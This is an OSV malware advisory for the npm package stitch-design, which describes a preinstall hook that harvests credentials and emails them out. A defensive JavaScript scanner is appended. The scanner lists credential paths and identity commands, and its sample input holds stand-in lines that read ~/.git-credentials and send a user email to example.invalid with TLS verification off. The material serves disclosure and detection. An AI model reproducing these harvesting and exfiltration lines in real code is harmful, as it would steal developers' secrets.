stitch-design @0.1.1
Vulnerability report · Last retrieved from osv.dev June 25, 2026 at 10:42 AM UTC
OSV ID
MAL-2026-6456
Ecosystem
npm
Summary
The npm package ships a preinstall lifecycle hook (scripts/preinstall.js) that, on npm install, reads classic installer-secret paths — ~/.gitconfig, ~/.git-credentials, ~/.ssh/*.pub, ~/.npmrc, ~/.docker/config.json — and runs subprocesses (git config --global/--system user.email, gh api user, claude auth status, npm config get email) to capture identity material. It regex-extracts every email-shaped string from the contents and issues HTTPS GETs to https://stitch-design.ai/api/v1?src=...&user=<email> for each match, with TLS verification explicitly disabled (rejectUnauthorized: false). The same harvester is duplicated in bin/cli.js (the package's bin entry, stitch-design), so every CLI invocation after install repeats the credential-path reads and exfiltration. Both files carry cover-story comments claiming to be a temporary placeholder that just prints a notice, while roughly 150 lines of harvesting and exfiltration code execute first. The combination of preinstall auto-execution, reads from canonical credential paths, a hardcoded remote destination, disabled TLS verification, and a misleading placeholder narrative is an unambiguous installer-side credential exfiltration attack.
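A defender-side check for the pattern described above, added here as an example and not part of the OSV record or the package: it flags packages whose auto-run lifecycle hooks reference the credential paths, identity commands, disabled TLS verification and hardcoded outbound URL listed in the summary. The package.json and script body it scans are constructed stand-ins (only indicator strings, not working code); the function names and thresholds are assumptions.

```javascript
// Indicators taken from the report summary; matched as plain substrings or regexes.
const CREDENTIAL_PATHS = ['.gitconfig', '.git-credentials', '.ssh/', '.npmrc', '.docker/config.json'];
const IDENTITY_COMMANDS = ['git config --global', 'git config --system', 'gh api user',
  'claude auth status', 'npm config get email'];
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall']; // run automatically by npm install

// Lifecycle hooks a package.json declares (these execute without user interaction).
function installHooks(packageJsonText) {
  const scripts = JSON.parse(packageJsonText).scripts || {};
  return LIFECYCLE_HOOKS.filter((h) => typeof scripts[h] === 'string');
}

// Static indicator scan of one script body; returns human-readable findings.
function scanScript(source) {
  const findings = [];
  for (const p of CREDENTIAL_PATHS) if (source.includes(p)) findings.push(`reads credential path ${p}`);
  for (const c of IDENTITY_COMMANDS) if (source.includes(c)) findings.push(`runs identity command "${c}"`);
  if (/rejectUnauthorized\s*:\s*false/.test(source)) findings.push('disables TLS verification');
  if (/https?:\/\/[A-Za-z0-9.-]+\.[A-Za-z]{2,}[/?'"]/.test(source)) findings.push('hardcoded outbound URL');
  return findings;
}

// Combine hook presence with script findings into a verdict: 'clean', 'review' or 'block'.
// 'block' requires an auto-run hook plus both a credential read and an outbound channel.
function assess(packageJsonText, scriptsByName) {
  const hooks = installHooks(packageJsonText);
  const findings = [];
  for (const [name, body] of Object.entries(scriptsByName)) {
    for (const f of scanScript(body)) findings.push(`${name}: ${f}`);
  }
  const credentialRead = findings.some((f) => f.includes('credential path'));
  const outbound = findings.some((f) => f.includes('outbound URL'));
  const verdict = findings.length === 0 ? 'clean'
    : (hooks.length > 0 && credentialRead && outbound) ? 'block' : 'review';
  return { hooks, findings, verdict };
}

// Constructed sample input mirroring the reported layout (hypothetical package name).
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: 'example-pkg', version: '0.0.1',
  scripts: { preinstall: 'node scripts/preinstall.js' }, bin: { 'example-cli': 'bin/cli.js' },
});
const SAMPLE_SCRIPT = [
  '// Temporary placeholder: prints a notice',
  "const creds = fs.readFileSync(os.homedir() + '/.git-credentials', 'utf8');",
  "execSync('git config --global user.email');",
  "https.get('https://example.invalid/api/v1?user=' + email, { rejectUnauthorized: false });",
].join('\n');

console.log(assess(SAMPLE_PACKAGE_JSON, { 'scripts/preinstall.js': SAMPLE_SCRIPT }));
```

Run it in a CI step over a freshly unpacked tarball (npm pack) and treat a 'block' verdict as a hard failure; 'review' findings in a package without install hooks still deserve a manual look, since the report notes the same harvester also runs from the bin entry.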
Source: amazon-inspector (81a0c5de3abe7924f58304e27e1537821c217c9348c060b31c5424407f9f10cc)